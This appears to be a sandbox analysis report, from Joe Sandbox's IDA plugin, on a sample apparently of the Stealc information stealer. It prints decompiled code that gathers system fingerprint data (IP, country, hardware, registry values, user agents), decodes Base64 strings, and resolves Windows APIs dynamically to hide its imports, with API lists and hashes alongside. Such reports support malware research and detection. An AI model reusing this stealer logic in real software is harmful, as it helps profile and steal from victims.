				_v60 = 0xff;
				_t867 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t436 =  *0x383684(0x80000002,  *0x3832d0, 0, 0x20119,  &_v44);
				_t1002 = _t436;
				if(_t436 == 0) {
					 *0x38366c(_v44,  *0x383360, 0, 0, _t867,  &_v60);
				}
				 *0x3836f0(_v44);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1002, _t867), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1002, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1002,  *0x383528), _t818,  &_v16);
				E00171839(_v40);
				_v44 = _v44 & 0x00000000;
				_push( &_v44);
				_push(GetCurrentProcess());
				if( *0x38374c() == 0) {
					L4:
					_t456 =  *0x383204; // 0x0
				} else {
					_t1004 = _v44;
					_t456 =  *0x3830c4; // 0x0
					if(_v44 == 0) {
						goto L4;
					}
				}
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t456), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x3830f0), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, E0017D193(_t818)), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x383250), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, E0017D1C5(_t818)), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x38318c), _t818,  &_v16);
				E00171839(_v40);
				_t505 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				 *0x3836cc( &_v76);
				 *0x3835d0(_t505,  *0x383520, _v76 & 0x0000ffff, _v74 & 0x0000ffff, _v70 & 0x0000ffff, _v68 & 0x0000ffff, _v66 & 0x0000ffff, _v64 & 0x0000ffff);
				_t994 = _t993 + 0x20;
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t505), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x3832bc), _t818,  &_v16);
				E00171839(_v40);
				_t899 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_push( &_v516);
				if( *0x3837a4() != 0xffffffff) {
					_t809 = _v516;
					_t818 = 0xffffffc4;
					asm("cdq");
					_t1006 = _t809 % _t818;
					 *0x3835d0(_t899, "%d", _t809 / _t818);
					_t994 = _t994 + 0xc;
				}
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1006, _t899), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1006, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1006,  *0x383378), _t818,  &_v16);
				E00171839(_v40);
				_t550 =  *0x383654( &_v516, 0x55);
				_t1007 = _t550;
				if(_t550 != 0) {
					_t551 =  *0x3836e8(0x40, 5);
					_t906 = _t551;
					 *0x3836d4( &_v516, _t551);
				} else {
					_t906 = 0x17fbd9;
				}
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1007, _t906), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1007, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1007,  *0x3833d4), _t818,  &_v16);
				E00171839(_v40);
				_t570 = E0017D200(_t1007,  &_v40);
				_pop(_t819);
				E0017EA2F(E0017EA69( &_v16, _t819, _t570,  &_v28, _t1007), _t819,  &_v16);
				E00171839(_v28);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1007, _t814), _t819,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v40, _t1007,  *0x3830f4), _t819,  &_v16);
				E00171839(_v40);
				_push( &_v28);
				if( *0x3835cc() == 0) {
					L12:
					_t590 =  *0x383048; // 0x0
				} else {
					_t1009 = _v27 - 0x80;
					_t590 =  *0x38331c; // 0x0
					if(_v27 >= 0x80) {
						goto L12;
					}
				}
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1009, _t590), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1009, _t814), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1009,  *0x3830c0), _t819,  &_v16);
				E00171839(_v28);
				_v60 = 0xff;
				_t925 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t609 =  *0x383684(0x80000002,  *0x383124, 0, 0x20119,  &_v44);
				_t1010 = _t609;
				if(_t609 == 0) {
					 *0x38366c(_v44,  *0x383404, 0, 0, _t925,  &_v60);
				}
				 *0x3836f0(_v44);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t925), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t814), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1010,  *0x383298), _t819,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, E0017D2F3()), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t814), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1010,  *0x3833c4), _t819,  &_v16);
				E00171839(_v28);
				GetSystemInfo( &_v312);
				 *0x3835d0( &_v1516, "%d", _v312.dwNumberOfProcessors);
				_t995 = _t994 + 0xc;
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010,  &_v1516), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t814), _t819,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1010,  *0x383240), _t819,  &_v16);
				E00171839(_v28);
				_t944 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t663 = 0;
				do {
					 *((char*)(_t992 + _t663 - 0x150)) = 0;
					if (_t663 != 0) goto L17;
					_t663 = _t663 + 1;
				} while (_t663 < 0x40);
				_t664 =  &_v340;
				_v340 = 0x40;
				GlobalMemoryStatusEx(_t664);
				_t1014 = _t664 - 1;
				if(_t664 != 1) {
					_t820 = 0;
					_t665 = 0;
					__eflags = 0;
				} else {
					_t806 = _v328;
					_t820 = (_t806 << 0x00000020 | _v332) >> 0x14;
					_t665 = _t806 >> 0x14;
				}
				 *0x3835d0(_t944, "%d MB", _t820, _t665);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v56, _t1014, _t944), _t820,  &_v16);
				E00171839(_v56);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v28, _t1014, _t814), _t820,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v40, _t1014, "\t- Display Resolution: "), _t820,  &_v16);
				E00171839(_v40);
				_t682 =  *0x3836f4( *0x383038, 0, 0, 0);
				_v44 = _t682;
				_t683 =  *0x3836a0(_t682, 8);
				_v80 = _t683;
				_t684 =  *0x3836a0(_v44, 0xa);
				_v60 = _t684;
				 *0x383734(0, _v44);
				_t687 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				 *0x3835d0("%dx%d", _v80, _v60);
				E0017E990( &_v40, 0, _t687);
				E0017EA2F(E0017EA69( &_v16, _t820,  &_v40,  &_v56, 0), _t820,  &_v16);
				E00171839(_v56);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v248, 0, _t814), _t820,  &_v16);
				E00171839(_v248);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v260, 0,  *0x3834f0), _t820,  &_v16);
				E00171839(_v260);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v116, 0, _t814), _t820,  &_v16);
				E00171839(_v116);
				E0017EA2F(E0017EA69( &_v16, _t820, E0017D3B2( &_v224, 0),  &_v116, 0), _t820,  &_v16);
				E00171839(_v116);
				E00171839(_v224);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v212, 0, "User Agents:"), _t820,  &_v16);
				E00171839(_v212);
				_t816 = "\n";
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v236, 0, "\n"), _t820,  &_v16);
				E00171839(_v236);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v140, 0,  *0x383120), _t820,  &_v16);
				E00171839(_v140);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v176, 0, "\n"), _t820,  &_v16);
				E00171839(_v176);
				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v92, 0,  *0x383508), _t820,  &_v16);
				E00171839(_v92);
				_t746 = E0017D460(0,  &_v200, 0x80000002);
				_t822 = _t687;
				E0017EA2F(E0017EA69( &_v16, _t822, _t746,  &_v92, 0), _t822,  &_v16);
				E00171839(_v92);
				E00171839(_v200);
				E0017EA2F(E0017EAAB( &_v16, _t822,  &_v272, 0, "\n"), _t822,  &_v16);
				E00171839(_v272);
				E0017EA2F(E0017EAAB( &_v16, _t822,  &_v104, 0,  *0x3834d4), _t822,  &_v16);
				E00171839(_v104);
				_t765 = E0017D460(0,  &_v152, 0x80000001);
				_pop(_t824);
				E0017EA2F(E0017EA69( &_v16, _t824, _t765,  &_v104, 0), _t824,  &_v16);
				E00171839(_v104);
				E00171839(_v152);
				E0017EA2F(E0017EAAB( &_v16, _t824,  &_v164, 0, "\n"), _t824,  &_v16);
				E00171839(_v164);
				E0017EA2F(E0017EAAB( &_v16, _t824,  &_v188, 0, _t816), _t824,  &_v16);
				E00171839(_v188);
				E0017EA2F(E0017EAAB( &_v16, _t824,  &_v128, 0,  *0x3834c8), _t824,  &_v16);
				E00171839(_v128);
				E0017EA2F(E0017EA69( &_v16, _t824, E0017D661( &_v72, 0),  &_v128, 0), _t824,  &_v16);
				E00171839(_v128);
				E00171839(_v72);
				_push( *0x383658(_v16));
				_push(_v16);
				E0017E990(_t995 + 0x20 - 0xc, 0,  *0x3831dc);
				E001716CB( &_a4, _t995 + 0x20 - 0xffffffffffffffbc);
				_push( &_v72);
				E00173786(_t824, 0);
				E00171839(_v72);
				E00171839(_v16);
				return E001716AC( &_a4);
			}

0x001792e7
0x001792e7
0x001792fb
0x00179300
0x00179314
0x0017931c
0x00179334
0x0017933c
0x00179350
0x00179358
0x00179370
0x00179378
0x0017938c
0x00179394
0x001793ac
0x001793b4
0x001793c8
0x001793d0
0x001793e4
0x001793ec
0x00179405
0x0017940d
0x00179421
0x00179429
0x00179442
0x0017944a
0x00179467
0x0017946f
0x00179477
0x0017948b
0x00179493
0x001794ac
0x001794b4
0x001794c1
0x001794d5
0x001794ed
0x001794f3
0x001794f5
0x00179509
0x00179509
0x00179512
0x00179527
0x0017952f
0x00179543
0x0017954b
0x00179564
0x0017956c
0x00179571
0x00179578
0x0017957f
0x00179588
0x00179595
0x00179595
0x0017958a
0x0017958a
0x0017958e
0x00179593
0x00000000
0x00000000
0x00179593
0x001795a9
0x001795b1
0x001795c5
0x001795cd
0x001795e6
0x001795ee
0x00179607
0x0017960f
0x00179623
0x0017962b
0x00179644
0x0017964c
0x00179665
0x0017966d
0x00179681
0x00179689
0x001796a2
0x001796aa
0x001796b9
0x001796c5
0x001796f0
0x001796f6
0x00179708
0x00179710
0x00179724
0x0017972c
0x00179745
0x0017974d
0x00179762
0x0017976a
0x00179774
0x00179776
0x0017977e
0x0017977f
0x00179780
0x00179789
0x0017978f
0x0017978f
0x001797a1
0x001797a9
0x001797bd
0x001797c5
0x001797de
0x001797e6
0x001797f4
0x001797fa
0x001797fc
0x00179809
0x0017980f
0x00179819
0x001797fe
0x001797fe
0x001797fe
0x0017982e
0x00179836
0x0017984a
0x00179852
0x0017986b
0x00179873
0x0017987c
0x00179883
0x00179892
0x0017989a
0x001798a2
0x001798b6
0x001798be
0x001798d7
0x001798df
0x001798e7
0x001798f0
0x001798fd
0x001798fd
0x001798f2
0x001798f2
0x001798f6
0x001798fb
0x00000000
0x00000000
0x001798fb
0x00179911
0x00179919
0x0017992d
0x00179935
0x0017994e
0x00179956
0x00179963
0x00179977
0x0017998f
0x00179995
0x00179997
0x001799ab
0x001799ab
0x001799b4
0x001799c9
0x001799d1
0x001799e5
0x001799ed
0x00179a06
0x00179a0e
0x00179a27
0x00179a2f
0x00179a43
0x00179a4b
0x00179a64
0x00179a6c
0x00179a78
0x00179a90
0x00179a96
0x00179aae
0x00179ab6
0x00179aca
0x00179ad2
0x00179aeb
0x00179af3
0x00179b08
0x00179b0a
0x00179b0c
0x00179b0c
0x00179b16
0x00179b18
0x00179b19
0x00179b1e
0x00179b25
0x00179b2f
0x00179b35
0x00179b38
0x00179b4f
0x00179b51
0x00179b51
0x00179b3a
0x00179b3a
0x00179b46
0x00179b4a
0x00179b4a
0x00179b5b
0x00179b73
0x00179b7b
0x00179b8f
0x00179b97
0x00179baf
0x00179bb7
0x00179bc7
0x00179bd0
0x00179bd3
0x00179bde
0x00179be1
0x00179bea
0x00179bee
0x00179bfd
0x00179c11
0x00179c1e
0x00179c33
0x00179c3b
0x00179c43
0x00179c5a
0x00179c65
0x00179c81
0x00179c8c
0x00179ca0
0x00179ca8
0x00179cc8
0x00179cd0
0x00179cdb
0x00179cf6
0x00179d01
0x00179d06
0x00179d1d
0x00179d28
0x00179d44
0x00179d4f
0x00179d66
0x00179d71
0x00179d8a
0x00179d92
0x00179da3
0x00179dab
0x00179dba
0x00179dc2
0x00179dcd
0x00179de4
0x00179def
0x00179e08
0x00179e10
0x00179e21
0x00179e29
0x00179e38
0x00179e40
0x00179e4b
0x00179e62
0x00179e6d
0x00179e84
0x00179e8f
0x00179ea8
0x00179eb0
0x00179ecd
0x00179ed5
0x00179edd
0x00179eeb
0x00179eec
0x00179efa
0x00179f07
0x00179f0f
0x00179f10
0x00179f1b
0x00179f23
0x00179f33

APIs

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2

Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F

Part of subcall function 0017D0BE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,0017FBD9), ref: 0017D155
Part of subcall function 0017D0BE: RtlAllocateHeap.NTDLL(00000000), ref: 0017D15C

Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1

GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00181EBC,00181EBC,00181EBC,- Country: ISO?,00181EBC,- IP: IP?,00181EBC,Network Info:,00181EBC,0017FBD9,?,?,?), ref: 001794C8
RtlAllocateHeap.NTDLL(00000000), ref: 001794CF
GetCurrentProcess.KERNEL32(00000000,00181EBC,00000000,?,?,?), ref: 00179579
GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00000000,00181EBC,00000000,00181EBC,00000000,?,?,?), ref: 001796B2
RtlAllocateHeap.NTDLL(00000000), ref: 001796B9
GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00000000), ref: 00179755
RtlAllocateHeap.NTDLL(00000000), ref: 0017975C
GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00000000), ref: 0017996A
RtlAllocateHeap.NTDLL(00000000), ref: 00179971
GetSystemInfo.KERNEL32(?,00181EBC,00000000,00181EBC,00000000), ref: 00179A78
GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,?), ref: 00179AFB
RtlAllocateHeap.NTDLL(00000000), ref: 00179B02
GlobalMemoryStatusEx.KERNEL32(00000000), ref: 00179B2F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00179BF6
RtlAllocateHeap.NTDLL(00000000), ref: 00179BFD

Part of subcall function 0017D460: lstrlen.KERNEL32(?), ref: 0017D565

Part of subcall function 0017D661: CloseHandle.KERNEL32(00000000), ref: 0017D6F3

lstrlen.KERNEL32(?,00181EBC,00181EBC,00181EBC,00181EBC,00181EBC,User Agents:,00181EBC,00181EBC,00000000), ref: 00179EE5

Part of subcall function 00173786: lstrlen.KERNEL32(?), ref: 001737DF

Strings

%dx%d, xrefs: 00179C0B
User Agents:, xrefs: 00179CE0
- IP: IP?, xrefs: 0017935D
Network Info:, xrefs: 00179321
- Country: ISO?, xrefs: 00179399
- Display Resolution: , xrefs: 00179B9C
%d MB, xrefs: 00179B55
@, xrefs: 00179B25

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$lstrcpylstrlen$lstrcat$CloseCurrentGlobalHandleInfoMemoryStatusSystem
String ID: - Country: ISO?$- Display Resolution: $- IP: IP?$%d MB$%dx%d$@$Network Info:$User Agents:
API String ID: 3168602311-524121769
Opcode ID: a6eb721dda6b12c946be4be8f41a740a81d14fc50f1aa4d990b4bdbb90081912
Instruction ID: 165d75e2ede0473c969eedd602644d0fa7de504100dbc4a2307fbb38cc7b0f23
Opcode Fuzzy Hash: a6eb721dda6b12c946be4be8f41a740a81d14fc50f1aa4d990b4bdbb90081912
Instruction Fuzzy Hash: D5728676D0022AABCF01FBA4EC469DDB7F9BF18300F5591A1B519B3161DB306F4A8B91

Uniqueness

Uniqueness Score: -1.00%

Function 001767F3 Relevance: 9.1, APIs: 6, Instructions: 81stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0017681A
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00176835
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0017683F
memcpy.MSVCRT ref: 001768A3
lstrcat.KERNEL32(0017FBD9,0017FBD9), ref: 001768C0
lstrcat.KERNEL32(0017FBD9,0017FBD9), ref: 001768D4

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 37cc39d87081a034e492440430b8eeba321e64ed3c8dfb7f135b1b765269dcdf
Instruction ID: b041403b4c50881f82bdcec61949b44775b6c3f8e1d534f23957f0555c1f06b3
Opcode Fuzzy Hash: 37cc39d87081a034e492440430b8eeba321e64ed3c8dfb7f135b1b765269dcdf
Instruction Fuzzy Hash: 8B21F9B5900219EFDB019FA8DD889EE7BBCFF08785F1440B5F909E2211E7309B559BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00174C21 Relevance: 3.0, APIs: 2, Instructions: 42
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00174C21(BYTE** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
				int _v8;
				BYTE* _t8;
				int _t9;

				 *__ebx = 0;
				_v8 = 0;
				 *__edi = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
					_t8 =  *0x3836e8(0x40,  *__edi);
					 *__ebx = _t8;
					if(_t8 != 0) {
						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
						_v8 = _t9;
						if(_t9 == 0) {
							 *__ebx =  *0x3837b4( *__ebx);
						}
					}
				}
				return _v8;
			}

0x00174c32
0x00174c34
0x00174c37
0x00174c41
0x00174c47
0x00174c4d
0x00174c51
0x00174c5d
0x00174c63
0x00174c68
0x00174c72
0x00174c72
0x00174c68
0x00174c51
0x00174c79

APIs

CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C39
CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C5D

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 520bd598584588ce78eac57bb658fde1f01f3da8c779da54a208047b25d78d8a
Instruction ID: ef49b9b8ac1f16ab86f612c05905ed2f02e873dd314e67884a283fa2921b58f0
Opcode Fuzzy Hash: 520bd598584588ce78eac57bb658fde1f01f3da8c779da54a208047b25d78d8a
Instruction Fuzzy Hash: E9F0E7B0142234BBCB235F66CD4DE8B7FBCEF06BA0F104095F9099A250D3718A40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017E08E Relevance: 148.9, APIs: 99, Instructions: 424
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0017E08E() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t21;

				_t1 =  *0x383768; // 0x76670000
				if(_t1 != 0) {
					 *0x383638 = GetProcAddress(_t1,  *0x3834a4);
					 *0x3836ac = GetProcAddress( *0x383768,  *0x383114);
					 *0x383614 = GetProcAddress( *0x383768,  *0x3830c8);
					 *0x3837a0 = GetProcAddress( *0x383768,  *0x3830fc);
					 *0x383788 = GetProcAddress( *0x383768,  *0x383448);
					 *0x3835c0 = GetProcAddress( *0x383768,  *0x383128);
					 *0x383760 = GetProcAddress( *0x383768,  *0x3832c8);
					 *0x38374c = GetProcAddress( *0x383768,  *0x3830a0);
					 *0x3836d0 = GetProcAddress( *0x383768,  *0x383118);
					 *0x3836cc = GetProcAddress( *0x383768,  *0x38315c);
					 *0x3837c0 = GetProcAddress( *0x383768,  *0x383260);
					 *0x3837a4 = GetProcAddress( *0x383768,  *0x3834fc);
					 *0x3835cc = GetProcAddress( *0x383768,  *0x383218);
					 *0x3835b4 = GetProcAddress( *0x383768,  *0x3832c4);
					 *0x383648 = GetProcAddress( *0x383768,  *0x38344c);
					 *0x383620 = GetProcAddress( *0x383768,  *0x3830e4);
					 *0x383634 = GetProcAddress( *0x383768,  *0x383314);
					 *0x383654 = GetProcAddress( *0x383768,  *0x383414);
					 *0x383674 = GetProcAddress( *0x383768,  *0x383410);
					 *0x383664 = GetProcAddress( *0x383768,  *0x383020);
					 *0x383678 = GetProcAddress( *0x383768,  *0x3833f4);
					 *0x3837b4 = GetProcAddress( *0x383768,  *0x383090);
					 *0x3835f8 = GetProcAddress( *0x383768,  *0x383190);
					 *0x3835fc = GetProcAddress( *0x383768,  *0x383430);
					 *0x3836e8 = GetProcAddress( *0x383768,  *0x3830dc);
					 *0x3835c4 = GetProcAddress( *0x383768,  *0x3833ac);
					 *0x3836f8 = GetProcAddress( *0x383768,  *0x383518);
					 *0x383618 = GetProcAddress( *0x383768,  *0x383374);
					 *0x383660 = GetProcAddress( *0x383768,  *0x3833f8);
					 *0x383600 = GetProcAddress( *0x383768,  *0x383460);
					 *0x3837c4 = GetProcAddress( *0x383768,  *0x383390);
					 *0x383610 = GetProcAddress( *0x383768,  *0x383294);
					 *0x38361c = GetProcAddress( *0x383768,  *0x3832dc);
					 *0x3835c8 = GetProcAddress( *0x383768,  *0x383008);
					 *0x383708 = GetProcAddress( *0x383768,  *0x38334c);
					 *0x3836c8 = GetProcAddress( *0x383768,  *0x3832a0);
					 *0x3835ec = GetProcAddress( *0x383768,  *0x383480);
					 *0x383774 = GetProcAddress( *0x383768,  *0x3831d8);
					 *0x3836d8 = GetProcAddress( *0x383768,  *0x3832d4);
					 *0x3836fc = GetProcAddress( *0x383768,  *0x383308);
				}
				 *0x383680 = LoadLibraryA( *0x383288);
				 *0x3836b4 = LoadLibraryA( *0x3834a0);
				 *0x383740 = LoadLibraryA( *0x383224);
				 *0x383628 = LoadLibraryA( *0x3831fc);
				 *0x3836a8 = LoadLibraryA( *0x3833fc);
				 *0x383790 = LoadLibraryA( *0x383158);
				_t8 =  *0x3836c0; // 0x76130000
				if(_t8 != 0) {
					 *0x383608 = GetProcAddress(_t8,  *0x3831a4);
					 *0x3835f0 = GetProcAddress( *0x3836c0,  *0x38342c);
					 *0x3835d8 = GetProcAddress( *0x3836c0,  *0x3831e4);
					 *0x383744 = GetProcAddress( *0x3836c0,  *0x38340c);
					 *0x38368c = GetProcAddress( *0x3836c0,  *0x3834f8);
				}
				_t9 =  *0x383680; // 0x0
				if(_t9 != 0) {
					 *0x38362c = GetProcAddress(_t9,  *0x3832b8);
					 *0x383670 = GetProcAddress( *0x383680,  *0x3831b8);
					 *0x383710 = GetProcAddress( *0x383680,  *0x383214);
					 *0x38373c = GetProcAddress( *0x383680,  *0x3830ec);
					 *0x383728 = GetProcAddress( *0x383680,  *0x383368);
					 *0x3836e0 = GetProcAddress( *0x383680,  *0x38351c);
					 *0x383644 = GetProcAddress( *0x383680,  *0x383280);
					 *0x383780 = GetProcAddress( *0x383680,  *0x383514);
				}
				_t10 =  *0x3836b4; // 0x0
				if(_t10 != 0) {
					 *0x3835e0 = GetProcAddress(_t10,  *0x3832c0);
					 *0x3836c4 = GetProcAddress( *0x3836b4,  *0x383104);
					 *0x383738 = GetProcAddress( *0x3836b4,  *0x383220);
					 *0x383750 = GetProcAddress( *0x3836b4,  *0x3834e0);
					 *0x383624 = GetProcAddress( *0x3836b4,  *0x383358);
				}
				_t11 =  *0x383740; // 0x0
				if(_t11 != 0) {
					 *0x38360c = GetProcAddress(_t11,  *0x38338c);
					 *0x38369c = GetProcAddress( *0x383740,  *0x3830b0);
					 *0x383764 = GetProcAddress( *0x383740,  *0x383068);
					 *0x383630 = GetProcAddress( *0x383740,  *0x383254);
					 *0x38372c = GetProcAddress( *0x383740,  *0x3834c4);
					 *0x383650 = GetProcAddress( *0x383740,  *0x38337c);
				}
				_t12 =  *0x38379c; // 0x762b0000
				if(_t12 != 0) {
					 *0x3837b0 = GetProcAddress(_t12,  *0x38327c);
					 *0x3835d4 = GetProcAddress( *0x38379c,  *0x383424);
					 *0x383798 = GetProcAddress( *0x38379c,  *0x383444);
					 *0x38378c = GetProcAddress( *0x38379c,  *0x383284);
					 *0x3835d0 = GetProcAddress( *0x38379c,  *0x38321c);
					 *0x383718 = GetProcAddress( *0x38379c,  *0x383388);
					 *0x38370c = GetProcAddress( *0x38379c,  *0x38341c);
					 *0x3836d4 = GetProcAddress( *0x38379c,  *0x383440);
				}
				_t13 =  *0x3835b8; // 0x76170000
				if(_t13 != 0) {
					 *0x38366c = GetProcAddress(_t13,  *0x3833a0);
					 *0x383770 = GetProcAddress( *0x3835b8,  *0x383164);
					 *0x383684 = GetProcAddress( *0x3835b8,  *0x383494);
					 *0x3836f0 = GetProcAddress( *0x3835b8,  *0x383110);
					 *0x3837ac = GetProcAddress( *0x3835b8,  *0x383530);
				}
